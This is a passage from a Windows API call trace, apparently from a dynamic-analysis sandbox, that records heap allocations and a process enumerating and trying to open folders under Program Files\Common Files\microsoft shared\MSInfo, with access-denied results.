hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0100.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.994] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c7a8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ᰀ")) returned 0 [0100.994] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0100.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0100.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0100.995] AreFileApisANSI () returned 1 [0100.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo", lpUsedDefaultChar=0x0) returned 54 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0100.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.996] AreFileApisANSI () returned 1 [0100.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0100.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76188 [0100.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 54 [0100.996] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.996] GetLastError () returned 0x5 [0100.996] GetLastError () returned 0x5 [0100.996] SetLastError (dwErrCode=0x5) [0100.996] GetLastError () returned 0x5 [0100.996] SetLastError (dwErrCode=0x5) [0100.996] GetLastError () returned 0x5 [0100.996] SetLastError (dwErrCode=0x5) [0100.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0100.996] AreFileApisANSI () returned 1 [0100.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0100.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0100.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 54 [0100.996] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.996] GetLastError () returned 0x5 [0100.996] GetLastError () returned 0x5 [0100.997] SetLastError (dwErrCode=0x5) [0100.997] GetLastError () returned 0x5 [0100.997] SetLastError (dwErrCode=0x5) [0100.997] GetLastError () returned 0x5 [0100.997] SetLastError (dwErrCode=0x5) [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0100.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.997] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0100.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0100.997] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0100.998] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.998] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa098aa4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0100.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.998] AreFileApisANSI () returned 1 [0100.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US", lpUsedDefaultChar=0x0) returned 60 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0100.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.998] AreFileApisANSI () returned 1 [0100.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0100.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0100.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 60 [0100.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.999] GetLastError () returned 0x5 [0100.999] GetLastError () returned 0x5 [0100.999] SetLastError (dwErrCode=0x5) [0100.999] GetLastError () returned 0x5 [0100.999] SetLastError (dwErrCode=0x5) [0100.999] GetLastError () returned 0x5 [0100.999] SetLastError (dwErrCode=0x5) [0100.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0100.999] AreFileApisANSI () returned 1 [0100.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0100.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0100.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 60 [0100.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.999] GetLastError () returned 0x5 [0100.999] GetLastError () returned 0x5 [0100.999] SetLastError (dwErrCode=0x5) [0100.999] GetLastError () returned 0x5 [0100.999] SetLastError (dwErrCode=0x5) [0100.999] GetLastError () returned 0x5 [0100.999] SetLastError (dwErrCode=0x5) [0100.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0101.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0101.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0101.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0101.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0101.097] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0101.098] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77f90 [0101.098] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa098aa4a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.098] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x73430dfb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x261f2e00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x7800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0101.098] HeapFree (in: hHeap=0x20000, 